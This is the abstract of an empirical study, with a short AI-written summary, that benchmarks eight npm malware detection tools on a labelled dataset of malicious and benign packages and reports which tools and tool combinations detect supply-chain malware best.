🤖 AI Summary
This study addresses the lack of a unified benchmark for evaluating malicious npm package detection tools, which has led to unreliable assessments. The authors construct a labeled dataset comprising 6,420 malicious and 7,288 benign packages, covering 11 types of malicious behaviors and 8 evasion techniques. They present the first systematic evaluation of 13 variants across 8 detection tools, combining quantitative metrics with source-code-level mechanistic analysis. Their findings reveal that detection performance hinges on how tools handle code capabilities and intent ambiguity, leading them to propose a discriminative logic based on behavior chains rather than isolated API calls. Experiments show GuardDog achieves the best single-tool performance (F1 = 93.32%), while behavior-chain recognition boosts detection rates from 3.2% to 79.3%. An optimal ensemble of tools attains 96.08% accuracy and 95.79% F1 score.
📝 Abstract
The NPM ecosystem has become a primary target for software supply chain attacks, yet existing detection tools are evaluated in isolation on incompatible datasets, making cross-tool comparison unreliable. We conduct a benchmark-driven empirical analysis of NPM malware detection, building a dataset of 6,420 malicious and 7,288 benign packages annotated with 11 behavior categories and 8 evasion techniques, and evaluating 8 tools across 13 variants. Unlike prior work, we complement quantitative evaluation with source-code inspection of each tool to expose the structural mechanisms behind its performance.
Our analysis reveals five key findings. Tool precision-recall positions are structurally determined by how each tool resolves the ambiguity between what code can do and what it intends to do, with GuardDog achieving the best balance at 93.32% F1. A single API call carries no directional intent, but a behavioral chain such as collecting environment variables, serializing, and exfiltrating disambiguates malicious purpose, raising SAP_DT detection from 3.2% to 79.3%. Most malware requires no evasion because the ecosystem lacks mandatory pre-publication scanning. ML degradation stems from concept convergence rather than concept drift: malware became simpler and statistically indistinguishable from benign code in feature space. Tool combination effectiveness is governed by complementarity minus false-positive introduction, not paradigm diversity, with strategic combinations reaching 96.08% accuracy and 95.79% F1. Our benchmark and evaluation framework are publicly available.